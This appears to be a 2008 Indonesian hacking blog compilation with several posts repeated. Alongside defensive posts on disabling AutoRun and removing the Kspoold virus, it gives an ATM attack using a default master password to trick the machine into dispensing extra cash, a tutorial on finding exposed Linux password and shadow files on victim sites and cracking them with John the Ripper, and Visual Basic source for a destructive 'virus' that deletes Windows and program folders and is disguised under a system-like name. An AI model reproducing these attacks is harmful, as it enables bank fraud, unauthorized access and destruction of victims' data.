cara Ampuh Mencegah Serangan Virus yg menyebar melalui Flash Disk
Author :N4is3N
Contact :Friendster.Profile.com/N4is3N
ATTENTION!!! THIS TUTUOR JUST FOR NEWBIE.FOR 37337, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR.THANKS.
Saya yakin temen2 semua sudah tau apa itu Flash Disk, jadi saya tidak akan menjelaskannya lagi.To the point aja ya...
Dari Beberapa sumber yg saya dapatkan,Penyebaran Virus yang tercepat adalah melalui Flash Disk.Mengapa hal tsb bisa terjadi? adapun beberapa faktor penyebabnya adalah sbb:
- Virus dapat menyembunyikan dirinya.
- Virus dapat melakukan kamuflase untuk menipu korbannya.
- Virus dapat memanfaatkan fasilitas AutoRun milik Windows untuk menjalankan file induknya.
Dari penjelasan2 di atas, saya akan menjelaskan poin yg terakhir yaitu pemanfaatan fasilitas AutoRun.Karena poin ini yg paling kritis dan riskan.Untuk poin2 yg lain, insya Allah akan saya jelaskan di lain Tutor.
Apa itu AutoRun? AutoRun adalah sebuah script yg di gunakan untuk menjalankan suatu file secara otomatis saat user mengakses ke suatu Drive, Menghubungkan Flash Disk atau memsukan CD/DVD ke CD/DVD Room.
Script ini sendiri sebenarnya berisi sederetan perintah yg intinya untuk menjalankan file Virus itu sendiri.
Berikut langkah2 Pencegahannya:
*Disable(menonAktifkan) AutoRun melalui Group Policy:
- Masuk ke RUN dan ketikan GPEDIT.MSC
- Setelah muncul layar Group Policy, klik folder System pada menu User Configuration dan Computer Configiration.
- Pada kolom Settings, klik dua kali Turn Off AutoPlay
- Setelah muncul layar Turn Off AutoPlay, klik tab Settings dan pilih opsi Enable pada menu Turn Off AutoPlay kemudian pilih All Drive pada kolom Turn Off AutoPlay on:
- Klik OK dan restart komputer anda.
*Disable(MenonAktifkan) AutoRun melalui Registry:
- Masuk ke RUN dan ketikan Regedit.
- Cari alamat registry berikut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Dan
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Polocies\Explorer
- Klik kanan pada string NoDriveTypeAutoRun
- isi Value Data dng ff yg berarti fungsi AuroRun akan di matikan pada 255 Drive
- klik OK dan Restart Komputer.
Sekian tutornya, moga bermanfaat buat mencegah serangan virus ke Komputer temen2 semua.
Thaks A lot.
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW
- My Soulmate, Nalla Nourma N "I Always Love you"
Warm Regards : - All HN Older and HN member " Thanks for your support"
Senin, 14 April 2008
Cracking Mesin ATM
Cracking Mesin ATM
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
"I DONT TAKE RESPONSIBLE FOR ANYTHING! JUST FOR KNOWLEDGE PURPOSE.THANKS"
---------------------------------------------------------------------------------------------------------------------------------
Kepanjangan dari Auto Teller Machine... saya rasa temen2 semua udah tau fungsi dari alat ini, jadi saya gak akan membahasnya lagi... hehe...
Hal ini hanya bekerja pada mesin tipe Tranax MiniBank 1500 series.
Berikut adalah cuplikan dari manual Book yg saya baca:
"To Access the operator Function menu, Hold the, and keys simultaneoulsly for 2 seconds, release them and press 1, then press 2, then press 3.The Timing of this procedure can be dificult at first."
Jadi initinya,untuk masuk ke dalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol, , dan secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2 dan 3.Mungkin timing awalnya akan susah saat anda mencoba pertama kali...
Kalo masih gak bisa login, cara kasarnya juga ada...wakakakakak XD~~
Matikan power ATM Machine, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan saat anda menyalakan kembali ATM, dia akan langsug masuk pada Operator Function...
Setelah masuk dalam operator Function, anda akan di tanyai 3 jenis password dan anda dapat memilih salah satunya:
- Operator Password ( Ini untuk mengakses menu dasar struktur ATM)
- Service Password ( Mangizinkan akses ke menu dasar dan diagnostic menu)
- Master Password (Mengizinkan anda mengakses penuh mesin tsb)
Nah, disini kunci pembicaraan kita...
Pada mesin Tranax MiniBank 1500 series, Defaul Master Passwordnya adalah 555555... dan saya rasa, gak banyak yg merubah default password tsb... haha! (Vulnerabilities pada default password sebenarnya sangat fatal.Akan saya jelaskan pada tutor selanjutnya yah)
Dari sana anda dapat melakukan banyak hal... termasuk di antaranya "Reset the status of the Cash catriges" , dimana membuat anda mungkin saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat Chasing-nya menjadi 4x lipat lebih banyak, namun Bank hanya akan hanya me-Reduce uang anda sebanyak 100rb sesuai request anda... wakakakakak!
Asiiik khaannn??!! hahaha!
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and great prophet Muhammad SAW
- My Soulmate, Nalla Nourma N ( I Always Love U honey)
Best Regards : - HN Admin( Imam_Samudra88, Gt_Portnoy, Mechawell, November18)
- All HN Older wherever U are now...
- All HN Member... Thx for Ur Support!
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
"I DONT TAKE RESPONSIBLE FOR ANYTHING! JUST FOR KNOWLEDGE PURPOSE.THANKS"
---------------------------------------------------------------------------------------------------------------------------------
Kepanjangan dari Auto Teller Machine... saya rasa temen2 semua udah tau fungsi dari alat ini, jadi saya gak akan membahasnya lagi... hehe...
Hal ini hanya bekerja pada mesin tipe Tranax MiniBank 1500 series.
Berikut adalah cuplikan dari manual Book yg saya baca:
"To Access the operator Function menu, Hold the
Jadi initinya,untuk masuk ke dalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol
Kalo masih gak bisa login, cara kasarnya juga ada...wakakakakak XD~~
Matikan power ATM Machine, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan saat anda menyalakan kembali ATM, dia akan langsug masuk pada Operator Function...
Setelah masuk dalam operator Function, anda akan di tanyai 3 jenis password dan anda dapat memilih salah satunya:
- Operator Password ( Ini untuk mengakses menu dasar struktur ATM)
- Service Password ( Mangizinkan akses ke menu dasar dan diagnostic menu)
- Master Password (Mengizinkan anda mengakses penuh mesin tsb)
Nah, disini kunci pembicaraan kita...
Pada mesin Tranax MiniBank 1500 series, Defaul Master Passwordnya adalah 555555... dan saya rasa, gak banyak yg merubah default password tsb... haha! (Vulnerabilities pada default password sebenarnya sangat fatal.Akan saya jelaskan pada tutor selanjutnya yah)
Dari sana anda dapat melakukan banyak hal... termasuk di antaranya "Reset the status of the Cash catriges" , dimana membuat anda mungkin saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat Chasing-nya menjadi 4x lipat lebih banyak, namun Bank hanya akan hanya me-Reduce uang anda sebanyak 100rb sesuai request anda... wakakakakak!
Asiiik khaannn??!! hahaha!
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and great prophet Muhammad SAW
- My Soulmate, Nalla Nourma N ( I Always Love U honey)
Best Regards : - HN Admin( Imam_Samudra88, Gt_Portnoy, Mechawell, November18)
- All HN Older wherever U are now...
- All HN Member... Thx for Ur Support!
Membuat AntiVirus Kspoold menggunakan NotePad
Membuat Anti-Virus Kspoold menggunakan NotePad.
Author : N4is3N
Contact : Friendster.Profile.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR.THANKS."
Virus Kspoold sebenernya bukan virus yg merusak Sistem.Mereka tidak memBlok fitur2 Windows seperti Task Manager,Run,Registry Editor dll.Tapi mereka meng-Infect file2 Word,Exel dll.Jadi pembuatan removalnya-pun lebih mudah.Tapi tidak ada salahnya kita belajar untuk membuat Anti-Virus Kspoold kita sendiri... ya kan?
Sekarang kita akan membuat Kspoold removal hanya dng berbekal NotePad.
==================================================================================================================
Echo off
Cls
REM - Ubah Warna
Color A
REM - Ubah Judul
Title Kspoold Killer * By N4is3N (Atau nama anda sendiri)
REM - Masuk ke Direktori Sistem
%SYSTEMDRIVE%
cd %SYSTEMROOT%\System32
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Hapus Registry yg di buat sebagai service virus
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet001\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet002\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\CurentControlSet\Service\KspooldDaemon" /f
REM - Hentikan Proses Virus
TaskKill /IM Kspoold.exe /F /T
REM - Set Atribut file Virus menjadi normal
Attrib -s -h -r Kspoold.exe
REM - Hapus file Virus
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue . . .
Echo.
Echo Well done - The "Kspoold" was completely removed
Echo.
Pause
==================================================================================================================
Copy paste Script di atas ke dalam NotePad, dan simpan sebagai Kspoold Killer.BAT.
Setelah di simpan, silakan jalankan dng cara mengKlik dua kali pada file Kspoold Killer.BAT.
Moga bermanfaat and nambah ilmu pengetahuan yaw! Thanks.
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate, Nalla Nourma N. "I always Love you".
warm Regards : - All HN Older, and HN member "Thanks a lot for Your Support"
Author : N4is3N
Contact : Friendster.Profile.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR.THANKS."
Virus Kspoold sebenernya bukan virus yg merusak Sistem.Mereka tidak memBlok fitur2 Windows seperti Task Manager,Run,Registry Editor dll.Tapi mereka meng-Infect file2 Word,Exel dll.Jadi pembuatan removalnya-pun lebih mudah.Tapi tidak ada salahnya kita belajar untuk membuat Anti-Virus Kspoold kita sendiri... ya kan?
Sekarang kita akan membuat Kspoold removal hanya dng berbekal NotePad.
==================================================================================================================
Echo off
Cls
REM - Ubah Warna
Color A
REM - Ubah Judul
Title Kspoold Killer * By N4is3N (Atau nama anda sendiri)
REM - Masuk ke Direktori Sistem
%SYSTEMDRIVE%
cd %SYSTEMROOT%\System32
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Hapus Registry yg di buat sebagai service virus
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet001\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet002\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\CurentControlSet\Service\KspooldDaemon" /f
REM - Hentikan Proses Virus
TaskKill /IM Kspoold.exe /F /T
REM - Set Atribut file Virus menjadi normal
Attrib -s -h -r Kspoold.exe
REM - Hapus file Virus
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue . . .
Echo.
Echo Well done - The "Kspoold" was completely removed
Echo.
Pause
==================================================================================================================
Copy paste Script di atas ke dalam NotePad, dan simpan sebagai Kspoold Killer.BAT.
Setelah di simpan, silakan jalankan dng cara mengKlik dua kali pada file Kspoold Killer.BAT.
Moga bermanfaat and nambah ilmu pengetahuan yaw! Thanks.
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate, Nalla Nourma N. "I always Love you".
warm Regards : - All HN Older, and HN member "Thanks a lot for Your Support"
John The Ripper Tutor
John The Ripper Tutor
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR. AND I DONT TAKE RESPONSIBLE FOR ANYTHING.THIS IS JUST FOR KNOWLEGDE PURPOSE.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Siapa sih yg gak kenal tool yg satu ini? namanya sudah terkenal di seantero jagat Hacking... karena keHandalan dan kemudahan penggunaannya.Bagi yg belum punya, kalian bisa mendownloadnya di www.OpenWall.com/John
Okeh, to the Point aja...
Sekarang kita akan mencari target lewat bantuan
Google (google.com). Ketik keyword berikut lalu klik tombol search:
Inurl:/etc/passwd/
Maksud dari sintak di atas adalah, untuk mencari dimana letak file Password tsb berada. Untuk melakukan password cracking, kita khan harus tau dimana file password yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.
Pada OS Linux, file passwordnya berada di lokasi /etc/passwd. Sedangkan shadow passwordnya berada di /etc/shadow (baca arsip lama mengenai Shadow Password). Dengan bantuan paman google, kita berusaha mencari file password dengan cara mengetikkan keyword diatas.
Well.. gimana nich hasil pencariannya? pasti muncul banyak khan.. ;) Klik salah satu link, dan isi file /etc/passwd akan ditampilkan. oleh browser. Copy- pastekan isi file tersebut pada notepad dan simpan dengan nama password.txt.
Sekarang, kita akan melihat isi file shadow passwordnya.Misalkan url situs korban yang anda buka tadi adalah:
http://www.spyrozone.net/spyrokid/config/etc/passwd-
Ubahlah alamat itu pada address bar menjadi:
http://www.spyrozone.net/spyrokid/config/etc/shadow-
Naah, kini isi dari file etc/shadow akan ditampilkan oleh browser. Copy- paste isi file tersebut pada notepad, lalu simpan dengan nama shadow.txt.
-----------------------------
Extract file hasil downloadnya ke suatu folder lalu buka lewat MSDOS. Biar gampang,copy juga file password.txt dan shadow.txt tadi ke directory yang sama dengan John The Ripper. Setelah itu, gabungkan file password.txt dan file shadow.txt dengan menggunakan program unshadow.exe milik John The Ripper. Perintahnya ialah:
unshadow password.txt shadow.txt >> crack.txt
Setelah itu, kita gunakan john-mmx.exe untuk mengCRACK file crack.txt dengan menggunakan perintah:
john-mmx crack.txt
Tunggu dech.. lamanya hasil crack yang keluar tergantung dari seberapa panjang password korban dan seberapa rumit karakter (special characters) yang digunakan dalam password. Jika proses cracking berhasil, akan muncul:
username (password)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Saya juga merangkum beberapa dokumentasi dari JTR.Bisa di lihat sbb:
Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session
-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --
Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)
Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.
Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]
Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt
2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.
Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]
Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt
3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara
Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]
Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt
Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.
Syntax:
john -show [passfile]>[output]
Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt
Anda juga dapat melihat langsung hasil decrypt dari JTR.
Syntax:
john -show [passfile]
Hasilnya terlihat seperti berikut:
root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left
- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C
- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.
Syntax
john w:[wordlist] -rules [passfile]
- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.
Syntax
john -restore
john -restore:[session name]
john -session:[session name]
- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.
- Semua password yang pernah di crack disimpan JTR di john.pot
Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/
2. http://www.sparkleware.com/lists.html
3. http://ftp.cerias.purdue.edu/pub/dict/local/
4. ftp://sable.ox.ac.uk/pub/wordlists/
5. http://www.theargon.com/archives/wordlists/theargonlists/
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW
- My Soulmate, Nalla Nourma N (Thx Beib for your support)
Best Regards : - Admin of HN (Imam_Samudra88, Gt_Portnoy)
- All HN older
- All HN Member
Refrensi : SpyroZone,Echo and pengalaman pribadi.
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR. AND I DONT TAKE RESPONSIBLE FOR ANYTHING.THIS IS JUST FOR KNOWLEGDE PURPOSE.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Siapa sih yg gak kenal tool yg satu ini? namanya sudah terkenal di seantero jagat Hacking... karena keHandalan dan kemudahan penggunaannya.Bagi yg belum punya, kalian bisa mendownloadnya di www.OpenWall.com/John
Okeh, to the Point aja...
Sekarang kita akan mencari target lewat bantuan
Google (google.com). Ketik keyword berikut lalu klik tombol search:
Inurl:/etc/passwd/
Maksud dari sintak di atas adalah, untuk mencari dimana letak file Password tsb berada. Untuk melakukan password cracking, kita khan harus tau dimana file password yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.
Pada OS Linux, file passwordnya berada di lokasi /etc/passwd. Sedangkan shadow passwordnya berada di /etc/shadow (baca arsip lama mengenai Shadow Password). Dengan bantuan paman google, kita berusaha mencari file password dengan cara mengetikkan keyword diatas.
Well.. gimana nich hasil pencariannya? pasti muncul banyak khan.. ;) Klik salah satu link, dan isi file /etc/passwd akan ditampilkan. oleh browser. Copy- pastekan isi file tersebut pada notepad dan simpan dengan nama password.txt.
Sekarang, kita akan melihat isi file shadow passwordnya.Misalkan url situs korban yang anda buka tadi adalah:
http://www.spyrozone.net/spyrokid/config/etc/passwd-
Ubahlah alamat itu pada address bar menjadi:
http://www.spyrozone.net/spyrokid/config/etc/shadow-
Naah, kini isi dari file etc/shadow akan ditampilkan oleh browser. Copy- paste isi file tersebut pada notepad, lalu simpan dengan nama shadow.txt.
-----------------------------
Extract file hasil downloadnya ke suatu folder lalu buka lewat MSDOS. Biar gampang,copy juga file password.txt dan shadow.txt tadi ke directory yang sama dengan John The Ripper. Setelah itu, gabungkan file password.txt dan file shadow.txt dengan menggunakan program unshadow.exe milik John The Ripper. Perintahnya ialah:
unshadow password.txt shadow.txt >> crack.txt
Setelah itu, kita gunakan john-mmx.exe untuk mengCRACK file crack.txt dengan menggunakan perintah:
john-mmx crack.txt
Tunggu dech.. lamanya hasil crack yang keluar tergantung dari seberapa panjang password korban dan seberapa rumit karakter (special characters) yang digunakan dalam password. Jika proses cracking berhasil, akan muncul:
username (password)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Saya juga merangkum beberapa dokumentasi dari JTR.Bisa di lihat sbb:
Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session
-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --
Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)
Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.
Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]
Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt
2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.
Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]
Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt
3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara
Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]
Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt
Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.
Syntax:
john -show [passfile]>[output]
Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt
Anda juga dapat melihat langsung hasil decrypt dari JTR.
Syntax:
john -show [passfile]
Hasilnya terlihat seperti berikut:
root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left
- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C
- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.
Syntax
john w:[wordlist] -rules [passfile]
- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.
Syntax
john -restore
john -restore:[session name]
john -session:[session name]
- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.
- Semua password yang pernah di crack disimpan JTR di john.pot
Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/
2. http://www.sparkleware.com/lists.html
3. http://ftp.cerias.purdue.edu/pub/dict/local/
4. ftp://sable.ox.ac.uk/pub/wordlists/
5. http://www.theargon.com/archives/wordlists/theargonlists/
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW
- My Soulmate, Nalla Nourma N (Thx Beib for your support)
Best Regards : - Admin of HN (Imam_Samudra88, Gt_Portnoy)
- All HN older
- All HN Member
Refrensi : SpyroZone,Echo and pengalaman pribadi.
Bikin Virus Kejam Sekali
"Bikin Virus Kejam Sekali"
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR. AND I DONT TAKE RESPONSIBLE FOR ANYTHING.THIS IS JUST FOR KNOWLEGDE PURPOSE.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.
Yg diperluin:
1. Visual Basic(optimal : 6.0)
2. Ngerti tombol2nya VB
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode...
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\Virus_HN.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”) Call DelAll(”c:\windows\system32″) Call DelAll(”c:\windows”) Call DelAll(”C:\Documents and Settings\All Users”) Call DelAll(”C:\Documents and Settings\Administrator”) Call DelAll(”C:\Documents and Settings”) Call DelAll(”C:\Program Files\Common Files”) Call DelAll(”C:\Program Files\Internet Explorer”) Call DelAll(”C:\Program Files\Microsoft Visual Studio”) Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali kamu ga sengaja teken jadi kamu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya Virus_HN.txt, kamu ga bakal keserang ndiri… bisa kamu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, kamu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini saya menggunakan nama “SystemAdmin32″ jadi ga bakal dicurigain.
5. Jangan pernah naroh nama kamu di nih virus… key?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate Nalla Nourma N. "I always Love you".
warm Regards : - Admin of HN (Imam_Samudra88, Gt_Portnoy)
- All HN Older, and HN member "Thanks a lot for Your Support"
Referensi : Gwiqbal & Pengalaman pribadi
Author : N4is3N
Contact : Profile.Friendster.com/N4is3N
